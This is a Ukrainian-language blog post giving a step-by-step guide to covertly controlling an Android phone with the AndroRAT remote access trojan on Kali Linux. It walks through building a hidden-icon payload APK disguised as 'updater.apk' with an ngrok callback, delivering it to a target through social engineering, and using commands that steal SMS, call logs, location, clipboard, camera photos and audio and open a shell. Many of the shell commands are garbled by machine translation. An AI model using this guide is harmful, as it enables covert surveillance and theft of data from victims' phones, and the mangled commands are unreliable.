# lane

By [Сontinental](https://paragraph.com/@ontinental) · 2023-09-08

---

**спосіб віддаленого контролю телефону за допомогою AndroRAT та Kali Linux.**

### Для віддаленого контролю телефону потрібно:

*   Встановить АндроРАТ на Kali Linux.
    
*   Встановити та налаштувати ngrok.
    
*   Створити корисне навантаження (файл .apk, що виконується).
    
*   Встановити apk файл на цільовий пристрій.
    

Віддалений контроль телефону за допомогою AndroRAT
--------------------------------------------------

**AndroRAT** (Remote Access Tool/Trojan. AndroRAT) – призначений для віддаленого керування телефоном Android. Це клієнт-серверна програма, розроблена на Java Android для клієнтської частини, а серверна частина написана на Python.

Інструмент працюватиме на пристроях від Android 4.1 (Jellybean), Android 9 (Oreo), (від API 16 до API 28). Цей RAT може бути встановлений на Android 10 і вище , але деякі команди для отримання інформації можуть працювати не зовсім стабільно.

### Можливості AndroRAT:

*   Бекдор (автоматичне підключення).
    
*   Невидимий значок після встановлення.
    
*   Використовує мінімальні ресурси пристрою.
    
*   Автоматичний запуск після перезавантаження смартфона.
    
*   Можливість робити знімки з обох камер
    
*   Аудіо запис з мікрофона.
    
*   Перегляд журналу дзвінків та SMS.
    
*   Отримання поточного розташування.
    
*   Інформація про SIM-картку, IP-адресу та MAC-адресу пристрою.
    

Як встановити AndroRAT на Kali Linux
------------------------------------

Для роботи Андроїд потрібен Python3. **Для встановлення Python3 на Kali, використовуйте команду:**

    sudo apt встановити python3 python3 - pip
    

![](https://storage.googleapis.com/papyrus_images/1efd37b9bee783a040800673a025fc6774636f8899325c0194f55a88598eae30.png)

**Тепер необхідно встановити Java OpenJDK:**

Зайдіть на офіційний сайт Oracle, створіть обліковий запис Oracle і увійдіть за допомогою даних облікового запису.

![](https://storage.googleapis.com/papyrus_images/3bf190db821c09ae3f4c5b1a2136606d5bf81d1c9dafc22df6ea6e58bffec1ed.png)

Після реєстрації та входу в систему перейдіть на [сторінку завантаження OpenJDK](https://www.oracle.com/java/technologies/downloads/) . Перейдіть вниз і знайдіть версію OpenJDK 8.

![](https://storage.googleapis.com/papyrus_images/13dec6c186f99291f86de6af7c898ac6b9b1dd67ea4babc8d490b8b368455e6f.png)

Позначивши галочкою ліцензійну угоду, натисніть посилання **jdk-8u321-linux-x64.tar.gz** .

![](https://storage.googleapis.com/papyrus_images/1bc2c8c274c8c6f127e1271665ac7cf997190fdd529d3c60368346fad98027ff.png)

Після закінчення завантаження відкрийте термінал і зайдіть в /usr/lib/jvm:

    cd / usr / lib / jvm
    

Якщо в системі не встановлені інші версії Java, тоді доведеться створити каталог jvm /usr/lib:

    sudo mkdir - p / usr / lib / jvm
    

Вийміть архів OpenJDK:

    sudo tar - xvzf ~ / Завантаження / jdk - 8 u321 - linux - x64 . дьоготь . gz
    

![](https://storage.googleapis.com/papyrus_images/f3e2c7fe9f26a77bc349f84974af047ec228a8a7f9371fa98b85c1095957d72d.png)

Після вилучення файлів, перейдіть до каталогу **jdk1.8.0\_321** :

    cd jdk1 . 8,0 _321
    

Тепер необхідно змінити змінні середовища Java за допомогою текстового редактора (у моєму випадку використовується текстовий редактор Nano):

    sudo nano / etc / середовище
    

![](https://storage.googleapis.com/papyrus_images/70f760a663b9c8cc754c86fbd27aecdfaf0e78835e5a359c1880e57ee4deff62.png)

На скрині вище видно, деякі шляхи вже встановлені. Додати інші використовуючи символ **:** :

    /usr/lib/jvm/jdk1.8.0_321/bin:/usr/lib/jvm/jdk1.8.0_321/db/bin:/usr/lib/jvm/jdk1.8.0_321/jre/bin
    

![](https://storage.googleapis.com/papyrus_images/600050e7609f3b8a3f168e58a2274e1ff7da2412f80daec19d75bd0018847e40.png)

Збережіть зміни за допомогою клавіш «CTRL+X», потім «Y» та «Enter».

Встановіть OpenJDK 8 як альтернативу:

    sudo update - альтернативи -- встановити "/usr/bin/java"  "java"  "/usr/lib/jvm/jdk1.8.0_321/bin/java"  0
    

Встановіть компілятор Java:

    sudo update - альтернативи -- встановити "/usr/bin/java"  "java"  "/usr/lib/jvm/jdk1.8.0_321/bin/javac"  0
    

Тепер можна встановити Java OpenJDK 8:

    sudo update - alternatives — встановити java / usr / lib / jvm / jdk1 . 8.0 _321 / bin / java
    

Для компілятора Java використовуйте команду:

    sudo update - alternatives — встановити java / usr / lib / jvm / jdk1 . 8.0 _321 / bin / javac
    

Виведення цих команд показано на наступному знімку екрана:

![](https://storage.googleapis.com/papyrus_images/a613f17e0120e05ddf38552c0a392a7e906e213fd615851f99d841f17cef7f45.png)

Виберіть версію Java (зробити це можна з будь-якого каталогу):

    sudo update - альтернативи -- config java
    

![](https://storage.googleapis.com/papyrus_images/f644bc0539c435d30bcae1807b29281af54f1f5a019318116615ba7d04d3cf3d.png)

На наведеному вище знімку екрана ви побачите, що версія Java 8 знаходиться під номером **2** , а версія Java 11 – під номером **0** .

Щоб переключитися між версіями, виберіть відповідний номер. У моєму випадку - це **2** :

![](https://storage.googleapis.com/papyrus_images/27538a71fc9208c5df0da87de9ab46f51493249024bb20113900fe30723e56cb.png)

> Добре, тепер у нас використовується Java 8, йдемо далі!

### Наступний крок - клонування (установка) AndroRAT на Kali:

    git clone https : // github . com / karma9874 / AndroRAT
    

![](https://storage.googleapis.com/papyrus_images/c57a917586ae352bf0c5c561b5aba31cb1912dcd1bcff566d04efeb88b17824a.png)

Переходимо до каталогу AndroRAT за допомогою команди mv:

Встановлюємо залежності AndroRAT:

    Вимоги pip3 install - r . txt
    

![](https://storage.googleapis.com/papyrus_images/77073d1a9b85c21aceed9b6c95edf1d823bb7666ffd0c7c48fde66844704aebf.png)

Після цього потрібно [встановити ngrok](https://kali.tools/?p=5489) та встановити токен аутентифікації ngrok.

Для створення файлу APK потрібно виконати команду:

    python3 androRAT . py -- build -- ngrok - p 8888  - o ~ / Desktop / updater . apk
    

Аргумент **\--build** , що використовується в команді, використовує скрипт python androRAT.py і створює корисне навантаження (файл .apk). Аргумент **\-ngrok** використовується для віддаленого підключення через ngrok.

У локальній мережі можна використовувати ngrok і запустити команду з параметром -i. Після чого буде запущено слухача, який очікує зворотного підключення.

Для вибору іконки програми можна використати аргумент **\--icon** . У моєму випадку я хочу отримати **прихований** віддалений доступ до смартфону, тому пропускаю це налаштування.

Параметр **\-o** відповідає за вибір порту та розташування файлу .apk.

![](https://storage.googleapis.com/papyrus_images/00935b25c753a79e1b969491d75775e6b697ca2f05c1c3da4bb8d4824f70e168.png)

На скрині вище бачимо, що AndroRAT створює і підписує файл .apk. Після створення файлу буде запущено прослуховувач, який очікує підключення:

![](https://storage.googleapis.com/papyrus_images/6a1beb9b030a42e3e6d9842f151cf85e4f0956d2b68458df1f9ef1cb1aaff663.png)

Тепер можна надіслати apk файл на смартфон. Якщо у вас немає фізичного доступу до пристрою, тоді можна застосувати **методи соціальної інженерії** .

Як використовувати AndroRAT на Kali Linux
-----------------------------------------

Наприклад, встановимо АндроРАТ на свій персональний планшет. Після встановлення файлу на цільовому пристрої ви побачите наступне повідомлення в терміналі Kali:

![](https://storage.googleapis.com/papyrus_images/c301042a1be9fb70617db68fa680fc0b9f7b3b546ac90ba11b79e309f8d5c74a.png)

**З'єднання встановлено. Тепер для взаємодії з програмою будемо використовувати команди:**

*   deviceInfo – основна інформація про пристрій.
    
*   camList – ідентифікатор камери.
    
*   takepic \[ідентифікатор камери\] – знімок з камери.
    
*   startVideo \[ID камери\] — запис відео.
    
*   stopVideo — Зупинити запис відео та відкрити відеофайл.
    
*   startAudio — запись звука.
    
*   stopAudio — Зупинити запис звуку.
    
*   getSMS \[inbox|sent\] - вхідні / надіслані смс.
    
*   getCallLogs - історія дзвінків.
    
*   shell – запуск оболонки sh.
    
*   vibrate \[количество\_раз\] — вибрация.
    
*   getLocation — розташування пристрою.
    
*   getIP — ip-пристрої.
    
*   getSimDetails - інформація про всі sim-картки.
    
*   clear – очищення екрана.
    
*   getClipData – дані з буфера обміну.
    
*   getMACAddress — mac-адреса пристрою.
    
*   exit – вихід.
    

**Наприклад, для отримання всіх SMS запустимо команду getSMS:**

![](https://storage.googleapis.com/papyrus_images/a2e3e10a05003da74c098408da4c87f1a81e61e271bffa2d4058be61f7aaa5cd.png)

На скрині вище, можете бачити, як були отримані всі SMS та збережені у файл .txt, в каталозі «Dumps»

Так само, якщо ми хочемо зробити знімок з камери, потрібно запустити команду **camList** . Після цього з'явиться список усіх камер телефону. Потім можна зробити знімок за допомогою команди

    takepic [ номер камери ]
    

![](https://storage.googleapis.com/papyrus_images/32869d4258668387366b6f1fe42b03e27c5efda59700ca78ee39c6c23688efed.png)

---

*Originally published on [Сontinental](https://paragraph.com/@ontinental/lane-2)*